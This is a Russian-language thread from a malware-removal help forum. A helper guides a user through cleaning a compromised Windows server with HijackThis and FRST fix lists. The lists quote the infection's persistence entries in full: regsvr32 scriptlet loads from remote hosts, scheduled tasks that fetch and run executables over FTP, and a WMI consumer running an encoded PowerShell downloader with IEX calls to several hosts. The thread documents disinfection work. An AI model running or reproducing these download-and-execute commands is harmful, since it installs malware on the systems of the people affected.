win2008 R2, ftp.0603bye.info

[vti]

В автозагрузке - установка и запуск сервиса с сайта ftp.0603bye.info.
В планировщике заданий - задачи, активирующиеся при запуске компьютера с формированием скриптов с того же сайта.
В брандмауэр при каждой перезагрузке добавляются правила, разрешающие входящие/исходящие подключения на любой tcp-порт.

Удаление задач из планировщика, отключение пунктов автозагрузки не помогает.

[Info_bot]

Уважаемый(ая) vti, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:

Код:

O4-32 - (disabled) HKLM\..\Run-: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/08/26) - {9c7c588b-55e0-44b9-af80-06c5b58fd79e} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/08/26) - {9c7c588b-55e0-44b9-af80-06c5b58fd79e} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/08/26) - {9c7c588b-55e0-44b9-af80-06c5b58fd79e} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/08/26) - {9c7c588b-55e0-44b9-af80-06c5b58fd79e} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/08/26) - {9c7c588b-55e0-44b9-af80-06c5b58fd79e} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: (disabled) Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: (disabled) Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: (disabled) Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: (disabled) Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: (disabled) ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://139.5.177.19/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://139.5.177.19/3.txt scrobj.dll

Поменяйте пароли учёток с правами администратора.
Перезагрузите сервер.

Скорее всего, брутфорсят по RDP, а политиками число неудачных попыток входа не ограничено. И имена учёток тривиальные, что упрощает подбор.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[vti]

1. Строки пофиксил.
2. Пароли поменял.
3. В политиках безопасности поставил 5 попыток для ввода пароля.

После перезагрузки правило в брандмауэре "добавляется" снова, то же касается и автозагрузки + задач в планировщике задач.

Архив с логами - во вложении.

[Vvvyg]

Уведомление

Проведите фикс в FRST в безопасном режиме, может быть перезагрузка системы

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

Start::
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll <==== ATTENTION
Task: {155262E4-4E47-4052-AD57-A090D64E8723} - System32\Tasks\Mysa2 => cmd /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {20DCE5A0-4835-4878-ABCF-B5B2656B734C} - System32\Tasks\Mysa => cmd /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {47EA131A-3A98-4F82-AF82-A17629B2B8DB} - System32\Tasks\Mysa3 => cmd /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {83A1770B-1181-4279-90E6-0F02E4502AEC} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {B7F0043E-4D79-43EE-97B6-5B8EC6274F96} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
File: C:\Windows\system32\ok.exe
File: C:\Windows\system32\upsupx.exe
2019-08-27 09:34 - 2019-08-27 09:34 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2019-08-27 09:34 - 2019-08-27 09:34 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2019-08-27 09:34 - 2019-08-27 09:34 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2019-08-27 09:34 - 2019-08-27 09:34 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-08-27 09:34 - 2019-08-27 09:34 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-08-05 20:28 - 2019-08-27 06:09 - 000008842 _____ C:\Windows\system32\c.txt
2019-08-05 17:27 - 2019-08-27 09:33 - 000000067 _____ C:\Program Files\Common Files\xpdown.dat
2019-08-05 17:27 - 2019-08-27 06:08 - 002241024 _____ C:\Windows\system32\ok.exe
2019-08-05 17:27 - 2019-08-27 06:08 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-08-05 17:27 - 2019-08-26 11:54 - 000000084 _____ C:\Program Files\Common Files\xpwpd.dat
2019-08-05 17:27 - 2019-08-05 17:27 - 000000000 __SHD C:\Program Files\shengda
2019-08-05 17:27 - 2019-08-05 17:27 - 000000000 __SHD C:\Program Files\kugou2010
2019-08-05 16:58 - 2019-08-05 17:27 - 000145510 _____ C:\Windows\system32\abc.txt
2019-08-05 17:27 - 2019-08-26 11:54 - 000000084 _____ () C:\Program Files\Common Files\xpwpd.dat
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 661 more characters).] <==== ATTENTION
FirewallRules: [{A866A1DE-8BC2-4752-A0BC-7B0E5CC751EE}] => (Block) LPort=445
FirewallRules: [{FF1CBEBB-59DF-46FB-A8AA-0F3161CA6EAA}] => (Block) LPort=139
End::

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)